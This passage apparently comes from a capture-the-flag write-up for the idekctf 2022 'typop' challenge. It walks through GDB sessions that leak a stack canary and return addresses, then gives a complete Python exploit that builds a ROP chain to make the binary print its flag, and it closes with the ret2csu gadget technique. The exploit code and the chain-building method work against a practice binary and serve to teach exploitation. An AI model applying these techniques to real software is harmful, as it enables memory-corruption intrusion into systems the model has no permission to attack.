   0x00000000000013a6 <+94>:	call   0x10f0 <printf@plt>
   0x00000000000013ab <+99>:	movzbl -0x12(%rbp),%eax
   0x00000000000013af <+103>:	cmp    $0x79,%al
   0x00000000000013b1 <+105>:	jne    0x13c6 <getFeedback+126>
   0x00000000000013b3 <+107>:	lea    0xc88(%rip),%rdi        # 0x2042
   0x00000000000013ba <+114>:	mov    $0x0,%eax
   0x00000000000013bf <+119>:	call   0x10f0 <printf@plt>
   0x00000000000013c4 <+124>:	jmp    0x13d7 <getFeedback+143>
   0x00000000000013c6 <+126>:	lea    0xc84(%rip),%rdi        # 0x2051
   0x00000000000013cd <+133>:	mov    $0x0,%eax
   0x00000000000013d2 <+138>:	call   0x10f0 <printf@plt>
   0x00000000000013d7 <+143>:	lea    0xc82(%rip),%rdi        # 0x2060
   0x00000000000013de <+150>:	call   0x10d0 <puts@plt>
   0x00000000000013e3 <+155>:	lea    -0x12(%rbp),%rax
   0x00000000000013e7 <+159>:	mov    $0x5a,%edx
   0x00000000000013ec <+164>:	mov    %rax,%rsi
   0x00000000000013ef <+167>:	mov    $0x0,%edi
   0x00000000000013f4 <+172>:	call   0x1100 <read@plt>
   0x00000000000013f9 <+177>:	nop
   0x00000000000013fa <+178>:	mov    -0x8(%rbp),%rax
   0x00000000000013fe <+182>:	xor    %fs:0x28,%rax
   0x0000000000001407 <+191>:	je     0x140e <getFeedback+198>
   0x0000000000001409 <+193>:	call   0x10e0 <__stack_chk_fail@plt>
   0x000000000000140e <+198>:	leave  
   0x000000000000140f <+199>:	ret    
End of assembler dump.
(gdb) break *getFeedback+177
Breakpoint 1 at 0x13f9
(gdb) run
Starting program: /home/james/src/idekctf-2022-typop/attachments/chall 
Do you want to complete a survey?
y
Do you like ctf?
y
You said: y

That's great! Can you provide some extra feedback?
y

Breakpoint 1, 0x0000561a105aa3f9 in getFeedback ()
(gdb) x/2gx $rbp
0x7ffe664a6d50:	0x00007ffe664a6d60	0x0000561a105aa447
(gdb) set $stack_address = *(long *)$rbp
(gdb) set $return_address = *(long *)($rbp + 8)
(gdb) set {long}($rbp+8) = ($return_address - 532)
(gdb) set {long}($rbp+16) = ($stack_address + 0x4a + 16)
(gdb) set {long}($rbp+24) = ($return_address - 411)
(gdb) x/4gx $rbp
0x7ffe664a6d50:	0x00007ffe664a6d60	0x0000561a105aa233
0x7ffe664a6d60:	0x00007ffe664a6dba	0x0000561a105aa2ac
(gdb) set {char[9]}($rbp+32) = "flag.txt"
(gdb) x/9c $rbp+32
0x7ffe664a6d70:	102 'f'	108 'l'	97 'a'	103 'g'	46 '.'	116 't'	120 'x'	116 't'
0x7ffe664a6d78:	0 '\000'
(gdb) break *win+99
Breakpoint 2 at 0x561a105aa2ac
(gdb) c
Continuing.

Breakpoint 2, 0x0000561a105aa2ac in win ()
(gdb) x/9c $rsp
0x7ffe664a6d70:	102 'f'	108 'l'	97 'a'	103 'g'	46 '.'	116 't'	120 'x'	116 't'
0x7ffe664a6d78:	0 '\000'
(gdb) x/9c $rbp-0x4a
0x7ffe664a6d70:	102 'f'	108 'l'	97 'a'	103 'g'	46 '.'	116 't'	120 'x'	116 't'
0x7ffe664a6d78:	0 '\000'
(gdb) break fopen
Breakpoint 3 at 0x7fe35b32ec80: file iofopen.c, line 86.
(gdb) c
Continuing.

Breakpoint 3, _IO_new_fopen (filename=0x7ffe664a6d70 "flag.txt", 
    mode=0x561a105ab008 "r") at iofopen.c:86
86	iofopen.c: No such file or directory.
(gdb) c
Continuing.
idek{REDACTED}

*** stack smashing detected ***: terminated

Program received signal SIGABRT, Aborted.
__GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
50	../sysdeps/unix/sysv/linux/raise.c: No such file or directory.

Keeping the Canary Alive

The final obstacle stopping us from taking advantage of our buffer overflow is the presence of a stack protection mechanism called stack canaries:

$ pwn checksec attachments/chall
[*] '/home/james/src/idekctf-typop/attachments/chall'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

This leads us back to the funny code Ghidra generated because it couldn't understand the code added by the compiler for this feature. We can make more sense of it by looking at the assembly instructions instead:

(gdb) disas getFeedback
Dump of assembler code for function getFeedback:
   0x0000000000001348 <+0>:	endbr64 
   0x000000000000134c <+4>:	push   %rbp
   0x000000000000134d <+5>:	mov    %rsp,%rbp
   0x0000000000001350 <+8>:	sub    $0x20,%rsp
   0x0000000000001354 <+12>:	mov    %fs:0x28,%rax
   0x000000000000135d <+21>:	mov    %rax,-0x8(%rbp)
   0x0000000000001361 <+25>:	xor    %eax,%eax
   0x0000000000001363 <+27>:	movq   $0x0,-0x12(%rbp)
   0x000000000000136b <+35>:	movw   $0x0,-0xa(%rbp)
   0x0000000000001371 <+41>:	lea    0xcab(%rip),%rdi        # 0x2023
   0x0000000000001378 <+48>:	call   0x10d0 <puts@plt>
   0x000000000000137d <+53>:	lea    -0x12(%rbp),%rax
   0x0000000000001381 <+57>:	mov    $0x1e,%edx
   0x0000000000001386 <+62>:	mov    %rax,%rsi
   0x0000000000001389 <+65>:	mov    $0x0,%edi
   0x000000000000138e <+70>:	call   0x1100 <read@plt>
   0x0000000000001393 <+75>:	lea    -0x12(%rbp),%rax
   0x0000000000001397 <+79>:	mov    %rax,%rsi
   0x000000000000139a <+82>:	lea    0xc93(%rip),%rdi        # 0x2034
   0x00000000000013a1 <+89>:	mov    $0x0,%eax
   0x00000000000013a6 <+94>:	call   0x10f0 <printf@plt>
   0x00000000000013ab <+99>:	movzbl -0x12(%rbp),%eax
   0x00000000000013af <+103>:	cmp    $0x79,%al
   0x00000000000013b1 <+105>:	jne    0x13c6 <getFeedback+126>
   0x00000000000013b3 <+107>:	lea    0xc88(%rip),%rdi        # 0x2042
   0x00000000000013ba <+114>:	mov    $0x0,%eax
   0x00000000000013bf <+119>:	call   0x10f0 <printf@plt>
   0x00000000000013c4 <+124>:	jmp    0x13d7 <getFeedback+143>
   0x00000000000013c6 <+126>:	lea    0xc84(%rip),%rdi        # 0x2051
   0x00000000000013cd <+133>:	mov    $0x0,%eax
   0x00000000000013d2 <+138>:	call   0x10f0 <printf@plt>
   0x00000000000013d7 <+143>:	lea    0xc82(%rip),%rdi        # 0x2060
   0x00000000000013de <+150>:	call   0x10d0 <puts@plt>
   0x00000000000013e3 <+155>:	lea    -0x12(%rbp),%rax
   0x00000000000013e7 <+159>:	mov    $0x5a,%edx
   0x00000000000013ec <+164>:	mov    %rax,%rsi
   0x00000000000013ef <+167>:	mov    $0x0,%edi
   0x00000000000013f4 <+172>:	call   0x1100 <read@plt>
   0x00000000000013f9 <+177>:	nop
   0x00000000000013fa <+178>:	mov    -0x8(%rbp),%rax
   0x00000000000013fe <+182>:	xor    %fs:0x28,%rax
   0x0000000000001407 <+191>:	je     0x140e <getFeedback+198>
   0x0000000000001409 <+193>:	call   0x10e0 <__stack_chk_fail@plt>
   0x000000000000140e <+198>:	leave  
   0x000000000000140f <+199>:	ret    
End of assembler dump.

The instructions at offsets +12 through +21 save a value (known as the canary or a cookie) onto the stack, and the instructions at +178 through +193 verify that it hasn't been modified before the function returns. If the check fails, __stack_chk_fail aborts the entire program, so an overflow that clobbers the canary never gets to use an overwritten return address.

We can attempt a buffer overflow and watch our values clobber the canary and trigger the check to fail:

(gdb) break *getFeedback+172
Breakpoint 1 at 0x13f4
(gdb) break *getFeedback+177
Breakpoint 2 at 0x13f9
(gdb) c
The program is not being run.
(gdb) run
Starting program: /home/james/src/idekctf-typop/attachments/chall 
Do you want to complete a survey?
y
Do you like ctf?
y
You said: y

That's great! Can you provide some extra feedback?

Breakpoint 1, 0x0000560f656e23f4 in getFeedback ()
(gdb) x/6gx $rsp
0x7ffdc5e03da0:	0x0000000000000000	0x0a797f30af40db02
0x7ffdc5e03db0:	0x0000000000000000	0xefecc9babcf8fc00
0x7ffdc5e03dc0:	0x00007ffdc5e03dd0	0x0000560f656e2447
(gdb) c
Continuing.
#################

Breakpoint 2, 0x0000560f656e23f9 in getFeedback ()
(gdb) x/6gx $rsp
0x7ffdc5e03da0:	0x0000000000000000	0x23237f30af40db02
0x7ffdc5e03db0:	0x2323232323232323	0x0a23232323232323
0x7ffdc5e03dc0:	0x00007ffdc5e03dd0	0x0000560f656e2447
(gdb) c
Continuing.
*** stack smashing detected ***: terminated

Program received signal SIGABRT, Aborted.
__GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
50	../sysdeps/unix/sysv/linux/raise.c: No such file or directory.

Here we overwrote the canary value with 7 '#' characters (ordinal 0x23) and 1 newline character (ordinal 0xa). This caused the canary check to fail and crash the program.

This canary value is randomly generated every time a new process starts, making it difficult to guess. However, it doesn't change once initialized, so we can leak part of it through the getFeedback output and take advantage of the main loop to make as many passes as necessary to get past any NUL bytes in the output.

As a side note, what's with the bytes looking out of order? GDB displays memory from lower addresses to higher addresses, and in the previous display I asked it to show 8-byte integer values. x86 processors are little-endian, so a multi-byte value is stored starting with its least significant byte (the little end) and finishing with its most significant byte (the big end, the front of the number as written). This means the bytes within each displayed number appear reversed from how they're laid out in memory. We can ask GDB to show us individual bytes to see their exact order in memory:

(gdb) run
Starting program: /home/james/src/idekctf-typop/attachments/chall 
Do you want to complete a survey?
y
Do you like ctf?
y
You said: y

That's great! Can you provide some extra feedback?

Breakpoint 1, 0x0000562f267f43f4 in getFeedback ()
(gdb) x/48bx $rsp
0x7fff351839d0:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0x7fff351839d8:	0x02	0x2b	0x62	0x8a	0xa8	0x7f	0x79	0x0a
0x7fff351839e0:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0x7fff351839e8:	0x00	0xa4	0x6d	0xc2	0x18	0xb1	0x64	0x38
0x7fff351839f0:	0x00	0x3a	0x18	0x35	0xff	0x7f	0x00	0x00
0x7fff351839f8:	0x47	0x44	0x7f	0x26	0x2f	0x56	0x00	0x00
(gdb) x/6gx $rsp
0x7fff351839d0:	0x0000000000000000	0x0a797fa88a622b02
0x7fff351839e0:	0x0000000000000000	0x3864b118c26da400
0x7fff351839f0:	0x00007fff35183a00	0x0000562f267f4447
(gdb) c
Continuing.
#########

Breakpoint 2, 0x0000562f267f43f9 in getFeedback ()
(gdb) x/48bx $rsp
0x7fff351839d0:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0x7fff351839d8:	0x02	0x2b	0x62	0x8a	0xa8	0x7f	0x23	0x23
0x7fff351839e0:	0x23	0x23	0x23	0x23	0x23	0x23	0x23	0x0a
0x7fff351839e8:	0x00	0xa4	0x6d	0xc2	0x18	0xb1	0x64	0x38
0x7fff351839f0:	0x00	0x3a	0x18	0x35	0xff	0x7f	0x00	0x00
0x7fff351839f8:	0x47	0x44	0x7f	0x26	0x2f	0x56	0x00	0x00
(gdb) x/6gx $rsp
0x7fff351839d0:	0x0000000000000000	0x23237fa88a622b02
0x7fff351839e0:	0x0a23232323232323	0x3864b118c26da400
0x7fff351839f0:	0x00007fff35183a00	0x0000562f267f4447

Try not to get confused.
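If you'd rather not do the reversal in your head, Python's int.from_bytes performs the same conversion. This is a minimal sketch using the eight bytes GDB showed at 0x7fff351839d8 in the dump above; the variable names are only illustrative.

```python
# The eight bytes GDB printed at 0x7fff351839d8, in memory order
raw = bytes([0x02, 0x2b, 0x62, 0x8a, 0xa8, 0x7f, 0x79, 0x0a])

# Read as one little-endian 8-byte integer, the last byte in memory
# becomes the front of the printed number
as_giant_word = int.from_bytes(raw, 'little')
formatted = f'{as_giant_word:#018x}'
print(formatted)

# Converting back recovers the original memory order
round_trip = as_giant_word.to_bytes(8, 'little')
print(round_trip == raw)
```

The formatted value matches what x/6gx displayed for the same address.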

Also notice how the canary value ends with 0x00? Because of the little-endian ordering, that byte comes first in memory, so the canary starts with a NUL byte. This protects it from being leaked accidentally when an adjacent string on the stack is missing its terminating NUL byte and gets passed to one of the standard string output functions.

We can utilize the first buffer overflow in getFeedback to leak out the stack canary from the output of printf until we have the full value. Then we can keep going until we also get the stack address and the return address.
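Here's a rough simulation of why that works, assuming printf's %s simply copies bytes until it reaches a NUL. The frame contents are taken from the byte dump above; c_string and frame_after_read are hypothetical helpers standing in for printf and read, not anything from the binary.

```python
BUFFER_SIZE = 10

# Values from the GDB byte dump, in memory order
canary = bytes.fromhex('00a46dc218b16438')       # note the leading NUL
saved_rbp = bytes.fromhex('003a1835ff7f0000')
return_address = bytes.fromhex('47447f262f560000')

def c_string(mem, start=0):
    """Return the bytes a C string function would read from mem[start:]."""
    end = mem.find(b'\x00', start)
    return bytes(mem[start:] if end == -1 else mem[start:end])

def frame_after_read(user_input):
    """Lay out buffer, canary, saved rbp, return address; apply the write."""
    frame = bytearray(bytes(BUFFER_SIZE) + canary + saved_rbp + return_address)
    frame[:len(user_input)] = user_input
    return frame

# Filling the buffer exactly: the canary's NUL ends the string, nothing leaks
exact = c_string(frame_after_read(b'#' * 10))

# One extra byte replaces that NUL, so the string runs on through the canary
over = c_string(frame_after_read(b'#' * 11))
leaked = over[11:]
print(exact, leaked.hex())
```

In this particular run the saved stack address also starts with a NUL byte, so a single pass stops after the remaining seven canary bytes.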

We now have all the pieces and the strategy we need to craft an attack.

Scripting an Attack in Python

Note: you can read the complete Python source for my solution here.

We'll start by creating some boilerplate code to run and interact with a subprocess. We'll use ./chall for now, but we can change it to the netcat command for the remote service later once we've finished.

#!/usr/bin/env python

import sys
import subprocess

EXPLOITED_BUFFER_SIZE = 10
GETFEEDBACK_READ1_SIZE = 30
WIN_FOPEN_OFFSET = -411
RBP_ROP_OFFSET = -532
FLAG_STACK_OFFSET = 0x4a

def attack(cmd, skiplines=0):
    p = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE,
                         stdout=subprocess.PIPE, close_fds=True)
    print('Started', cmd, 'with pid', p.pid)

    # convenience function for showing output from the subprocess
    def echo(display=True):
        line = p.stdout.readline()
        if display and line:
            sys.stdout.write('server> ')
            sys.stdout.write(line.decode('utf-8'))
            sys.stdout.flush()
        return line
    for _ in range(skiplines):
        echo()
    # Remaining code goes here

if __name__ == '__main__':
    attack('./chall')

This code sets up a subprocess that we can interact with to read and send bytes. I also print out the current pid so we can add import pdb; pdb.set_trace() to our code and attach gdb to the running process before continuing. Finally, I added a little helper for echoing or discarding lines of output from the subprocess.

I also went ahead and made some named constants for all the magic numbers we distilled in our analysis and debugging sessions.

Now that we have the process up and running, we can try to apply what we've learned so far to leak the stack canary, the parent frame's stack address, and the return address:

    padding = b'#'*EXPLOITED_BUFFER_SIZE
    leaked_data = b'\x00' # we know the canary always has a leading NUL
    while len(leaked_data) + EXPLOITED_BUFFER_SIZE <= GETFEEDBACK_READ1_SIZE:
        # Do you want to complete a survey?
        echo(False)
        p.stdin.write(b'y\n')
        p.stdin.flush()

        # Do you like ctf?
        echo(False)
        filler = padding + b'#'*len(leaked_data)
        p.stdin.write(filler)
        p.stdin.flush()

        # You said: {filler}{additional_leaked_data}
        data = p.stdout.readline()
        offset = data.find(b'#') + EXPLOITED_BUFFER_SIZE + len(leaked_data)
        leaked_data += data[offset:-1]

        # Aww :( Can you provide some extra feedback?
        echo(False)
        p.stdin.write(padding + leaked_data)
        p.stdin.flush()

        # We know the leaked data terminates with a NUL byte
        leaked_data += b'\x00'

This leaks the maximum amount of stack data possible given the size argument passed to the first read call in getFeedback. We have to loop because some of the values we're leaking may have NUL bytes in them that stop printf from printing more values.
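To see the passes play out without a live process, here's a small offline simulation of the same loop. It's only a sketch: first_read and second_read are hypothetical stand-ins for the two read calls in getFeedback, and the frame contents are the ones from the GDB byte dump earlier.

```python
BUF = 10       # EXPLOITED_BUFFER_SIZE
READ1 = 30     # GETFEEDBACK_READ1_SIZE (0x1e)
READ2 = 0x5a   # size passed to the second read

# Frame contents from the GDB byte dump, in memory order
CANARY = bytes.fromhex('00a46dc218b16438')
SAVED_RBP = bytes.fromhex('003a1835ff7f0000')
RETURN_ADDRESS = bytes.fromhex('47447f262f560000')

def first_read(data):
    """Simulate read #1 plus printf('%s'): return (frame, printed bytes)."""
    frame = bytearray(bytes(BUF) + CANARY + SAVED_RBP + RETURN_ADDRESS)
    data = data[:READ1]
    frame[:len(data)] = data
    end = frame.find(b'\x00')
    return frame, bytes(frame if end == -1 else frame[:end])

def second_read(frame, data):
    """Simulate read #2 and the canary check before the function returns."""
    data = data[:min(READ2, len(frame))]
    frame[:len(data)] = data
    if bytes(frame[BUF:BUF + 8]) != CANARY:
        raise RuntimeError('*** stack smashing detected ***')

padding = b'#' * BUF
leaked_data = b'\x00'   # the canary's leading NUL is known in advance
passes = 0
while len(leaked_data) + BUF <= READ1:
    frame, shown = first_read(padding + b'#' * len(leaked_data))
    leaked_data += shown[BUF + len(leaked_data):]
    second_read(frame, padding + leaked_data)   # put the real values back
    leaked_data += b'\x00'                      # printf stopped at a NUL
    passes += 1

print(passes, leaked_data.hex())
```

With these values it takes four passes, one of which leaks nothing new because it lands directly on a NUL byte in the saved stack address.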

At this point, it's useful to print out the values we've leaked for debugging purposes.

    canary = int.from_bytes(leaked_data[0:8], 'little')
    print("Canary found:", hex(canary))
    stack_address = int.from_bytes(leaked_data[8:16], 'little')
    print("Return stack address found:", hex(stack_address))
    # Note: the first read's size argument is too small for us to always leak
    # the whole return address, so we assume the bytes we did leak are enough
    # and let from_bytes treat the missing high bytes as 0s
    return_address = int.from_bytes(leaked_data[16:24], 'little')
    print("Return address found:", hex(return_address))

Now we can construct our ROP chain and stack data for our attack payload:

    payload = canary.to_bytes(8, 'little')
    payload += stack_address.to_bytes(8, 'little')
    payload += (return_address + RBP_ROP_OFFSET).to_bytes(8, 'little')
    payload += (stack_address + 16 + FLAG_STACK_OFFSET).to_bytes(8, 'little')
    payload += (return_address + WIN_FOPEN_OFFSET).to_bytes(8, 'little')
    # Put the flag path here
    payload += b'flag.txt\x00'

This is exactly what we demonstrated in GDB before as a proof of concept, with the addition of the stack canary.
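As a cross-check, the same payload can be packed in one call with the standard struct module. This is just an equivalent sketch, not how my script does it: build_payload and GETFEEDBACK_READ2_SIZE are names I made up for illustration, and the sample values are the ones my script printed in the run at the end of this section.

```python
import struct

RBP_ROP_OFFSET = -532
WIN_FOPEN_OFFSET = -411
FLAG_STACK_OFFSET = 0x4a
EXPLOITED_BUFFER_SIZE = 10
GETFEEDBACK_READ2_SIZE = 0x5a   # size of the second read, from the disassembly

def build_payload(canary, stack_address, return_address):
    """Pack five little-endian 64-bit values followed by the flag path."""
    return struct.pack(
        '<5Q',
        canary,
        stack_address,
        return_address + RBP_ROP_OFFSET,
        stack_address + 16 + FLAG_STACK_OFFSET,
        return_address + WIN_FOPEN_OFFSET,
    ) + b'flag.txt\x00'

payload = build_payload(0x1eaf69b1bc4b7000, 0x7ffe1e1cee30, 0x56371d96a447)
total = EXPLOITED_BUFFER_SIZE + len(payload)
print(len(payload), total, total <= GETFEEDBACK_READ2_SIZE)
```

Including the padding, the whole write is 59 bytes, which fits inside the 0x5a (90) bytes the second read accepts.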

Finally, we add the code to execute our attack:

    # Do you want to complete a survey?
    echo()
    p.stdin.write(b'y\n')
    p.stdin.flush()

    # Do you like ctf?
    echo()
    p.stdin.write(b'y\n')
    p.stdin.flush()

    # You said: y
    echo()

    # That's great! Can you provide some feedback?
    echo()
    p.stdin.write(padding + payload)
    p.stdin.flush()

    # Drain the remaining output until EOF so we don't miss the flag
    while echo():
        pass
    p.wait()
    print()

It's important at this point to remember that we'll only see output that we echo from our subprocess. Don't forget to output the flag here! We need to capture and print any remaining output from the subprocess before it crashes.

Finally, we can give it a go:

$ python ./attack.py
Started ./chall with pid 39587
Canary found: 0x1eaf69b1bc4b7000
Return stack address found: 0x7ffe1e1cee30
Return address found: 0x56371d96a447
server> Do you want to complete a survey?
server> Do you like ctf?
server> You said: y
server>
server> That's great! Can you provide some extra feedback?
*** stack smashing detected ***: terminated
server> idek{REDACTED}
server>

Our subprocess still crashed, but not before giving us the flag!

Conclusion and Alternatives

While the method I used to capture the flag worked, it was very specific to the implementation of win() along with a bit of luck. After the CTF ended I decided to investigate some other possibilities and came across a useful set of ROP gadgets published in a 2018 presentation by Marco-Gisbert and Ripoll-Ripoll.

You can watch the presentation here, but I skipped right to the paper (my kids are too loud for me to be watching anything, but the paper is really good, trust me!).

Marco-Gisbert and Ripoll-Ripoll found two particular gadgets in __libc_csu_init that turn out to be present in most Linux binaries. Combined, these provide enough code to call any function taking up to three arguments under the x86-64 System V ABI.

Looking at the functions in chall, we can see that __libc_csu_init is present. Disassembling it shows that it still contains the ROP gadgets utilized by the method in the paper:

(gdb) info functions ^__libc_csu
All functions matching regular expression "^__libc_csu":

Non-debugging symbols:
0x0000000000001470  __libc_csu_init
0x00000000000014e0  __libc_csu_fini
(gdb) disas __libc_csu_init
Dump of assembler code for function __libc_csu_init:
   0x0000000000001470 <+0>:     endbr64
   0x0000000000001474 <+4>:     push   %r15
   0x0000000000001476 <+6>:     lea    0x28fb(%rip),%r15        # 0x3d78
   0x000000000000147d <+13>:    push   %r14
   0x000000000000147f <+15>:    mov    %rdx,%r14
   0x0000000000001482 <+18>:    push   %r13
   0x0000000000001484 <+20>:    mov    %rsi,%r13
   0x0000000000001487 <+23>:    push   %r12
   0x0000000000001489 <+25>:    mov    %edi,%r12d
   0x000000000000148c <+28>:    push   %rbp
   0x000000000000148d <+29>:    lea    0x28ec(%rip),%rbp        # 0x3d80
   0x0000000000001494 <+36>:    push   %rbx
   0x0000000000001495 <+37>:    sub    %r15,%rbp
   0x0000000000001498 <+40>:    sub    $0x8,%rsp
   0x000000000000149c <+44>:    call   0x1000 <_init>
   0x00000000000014a1 <+49>:    sar    $0x3,%rbp
   0x00000000000014a5 <+53>:    je     0x14c6 <__libc_csu_init+86>
   0x00000000000014a7 <+55>:    xor    %ebx,%ebx
   0x00000000000014a9 <+57>:    nopl   0x0(%rax)
   0x00000000000014b0 <+64>:    mov    %r14,%rdx
   0x00000000000014b3 <+67>:    mov    %r13,%rsi
   0x00000000000014b6 <+70>:    mov    %r12d,%edi
   0x00000000000014b9 <+73>:    call   *(%r15,%rbx,8)
   0x00000000000014bd <+77>:    add    $0x1,%rbx
   0x00000000000014c1 <+81>:    cmp    %rbx,%rbp
   0x00000000000014c4 <+84>:    jne    0x14b0 <__libc_csu_init+64>
   0x00000000000014c6 <+86>:    add    $0x8,%rsp
   0x00000000000014ca <+90>:    pop    %rbx
   0x00000000000014cb <+91>:    pop    %rbp
   0x00000000000014cc <+92>:    pop    %r12
   0x00000000000014ce <+94>:    pop    %r13
   0x00000000000014d0 <+96>:    pop    %r14
   0x00000000000014d2 <+98>:    pop    %r15
   0x00000000000014d4 <+100>:   ret

With these gadgets, we can now easily set the original arguments to win from values in the stack.

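To do so, first return into the gadget at 0x14ca, which pops values from the stack to set %r12 to 'f', %r13 to 'l', and %r14 to 'a'. It also pops %rbx and %r15, which have to be set so that the call instruction at 0x14b9 ends up in win. That call is indirect: call *(%r15,%rbx,8) jumps to the address stored in memory at %r15 + %rbx*8, so that location has to hold a pointer to win.

Second, return into the gadget at 0x14b0, which moves the values popped by the previous gadget into %edi, %rsi, and %rdx, the registers that carry the first three arguments to win, and then makes the call.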

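In fact, you can call any function of up to 3 arguments using these two gadgets together like this, with the caveat that the first argument only gets its low 32 bits because it is moved through %edi.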
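To make that concrete, here's a minimal sketch of how such a chain could be laid out for this binary. It is untested against the challenge. csu_call_chain, pie_base, and func_ptr_addr are hypothetical names, the addresses in the example call are made up, and it assumes a pointer to the target function has already been placed at a known address (func_ptr_addr), since the call at 0x14b9 goes through memory. The gadget offsets come from the disassembly above.

```python
import struct

CSU_POP_GADGET = 0x14ca    # pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
CSU_CALL_GADGET = 0x14b0   # mov r14,rdx; mov r13,rsi; mov r12d,edi; call *(r15,rbx,8)

def csu_call_chain(pie_base, func_ptr_addr, arg1, arg2, arg3):
    """Build the stack words that end in a call to *func_ptr_addr."""
    words = [
        pie_base + CSU_POP_GADGET,
        0,               # rbx: index 0, so the call reads the pointer at r15
        1,               # rbp: rbx + 1, so the loop exits if the call returns
        arg1,            # r12 -> edi (low 32 bits only)
        arg2,            # r13 -> rsi
        arg3,            # r14 -> rdx
        func_ptr_addr,   # r15: address of memory holding the function pointer
        pie_base + CSU_CALL_GADGET,
    ]
    return struct.pack('<8Q', *words)

# Made-up addresses, purely for illustration
chain = csu_call_chain(0x555555554000, 0x7ffc00001000,
                       ord('f'), ord('l'), ord('a'))
unpacked = struct.unpack('<8Q', chain)
print(len(chain), [hex(w) for w in unpacked])
```

If the called function returns and the chain needs to keep going, execution falls through to 0x14c6, which skips 8 bytes of stack and pops six more registers, so seven filler words and the next return address would have to follow.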

While I appreciate the generic power of this return to csu technique, I actually prefer the simplicity of my own carefully crafted ROP chain in this particular case. Nevertheless, I plan to use return to csu in the future!